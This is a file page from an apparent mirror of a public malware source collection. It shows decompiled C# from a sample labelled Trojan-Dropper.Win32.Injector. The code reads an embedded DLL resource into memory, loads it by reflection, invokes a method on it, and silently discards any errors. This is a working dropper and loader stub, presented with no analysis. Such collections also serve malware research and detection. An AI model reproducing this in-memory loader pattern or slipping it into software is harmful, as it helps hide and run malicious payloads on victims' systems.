mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-22 19:36:11 +00:00
42 lines
1.2 KiB
C#
42 lines
1.2 KiB
C#
|
// Decompiled with JetBrains decompiler
|
|||
|
// Type: program
|
|||
|
// Assembly: p3p2arcf, Version=4.12.1990.0, Culture=neutral, PublicKeyToken=null
|
|||
|
// MVID: 08CA09E7-85A3-4626-AC9B-26D79BD2D208
|
|||
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan-Dropper.Win32.Injector.brzn-390d49825b8f0729344f976534742b524d9ce900514040facccd5c65f882cf11.exe
|
|||
|
|
|||
|
using System;
|
|||
|
using System.IO;
|
|||
|
using System.Reflection;
|
|||
|
|
|||
|
public static class program
|
|||
|
{
|
|||
|
public static void Main(string[] args)
|
|||
|
{
|
|||
|
try
|
|||
|
{
|
|||
|
Type type = Assembly.Load(program.ReadFully(Assembly.GetExecutingAssembly().GetManifestResourceStream("kfj5ggvz.dll"))).GetType("someClass");
|
|||
|
type.GetMethod("myVoid").Invoke(Activator.CreateInstance(type), new object[0]);
|
|||
|
}
|
|||
|
catch (Exception ex)
|
|||
|
{
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
public static byte[] ReadFully(Stream stream)
|
|||
|
{
|
|||
|
byte[] buffer = new byte[32768];
|
|||
|
using (MemoryStream memoryStream = new MemoryStream())
|
|||
|
{
|
|||
|
while (true)
|
|||
|
{
|
|||
|
int count = stream.Read(buffer, 0, buffer.Length);
|
|||
|
if (count > 0)
|
|||
|
memoryStream.Write(buffer, 0, count);
|
|||
|
else
|
|||
|
break;
|
|||
|
}
|
|||
|
return memoryStream.ToArray();
|
|||
|
}
|
|||
|
}
|
|||
|
}
|